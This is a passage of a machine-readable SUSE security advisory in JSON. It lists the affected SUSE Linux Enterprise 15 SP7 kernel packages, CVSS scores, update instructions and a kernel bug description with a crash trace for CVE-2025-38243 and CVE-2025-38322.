"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/intel: Fix crash in icl_update_topdown_event()\n\nThe perf_fuzzer found a hard-lockup crash on a RaptorLake machine:\n\n Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000\n CPU: 23 UID: 0 PID: 0 Comm: swapper/23\n Tainted: [W]=WARN\n Hardware name: Dell Inc. Precision 9660/0VJ762\n RIP: 0010:native_read_pmc+0x7/0x40\n Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...\n RSP: 000:fffb03100273de8 EFLAGS: 00010046\n ....\n Call Trace:\n \u003cTASK\u003e\n icl_update_topdown_event+0x165/0x190\n ? ktime_get+0x38/0xd0\n intel_pmu_read_event+0xf9/0x210\n __perf_event_read+0xf9/0x210\n\nCPUs 16-23 are E-core CPUs that don\u0027t support the perf metrics feature.\nThe icl_update_topdown_event() should not be invoked on these CPUs.\n\nIt\u0027s a regression of commit:\n\n f9bdf1f95339 (\"perf/x86/intel: Avoid disable PMU if !cpuc-\u003eenabled in sample read\")\n\nThe bug introduced by that commit is that the is_topdown_event() function\nis mistakenly used to replace the is_topdown_count() call to check if the\ntopdown functions for the perf metrics feature should be invoked.\n\nFix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38322",
"url": "https://www.suse.com/security/cve/CVE-2025-38322"
},
{
"category": "external",
"summary": "SUSE Bug 1246447 for CVE-2025-38322",
"url": "https://bugzilla.suse.com/1246447"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
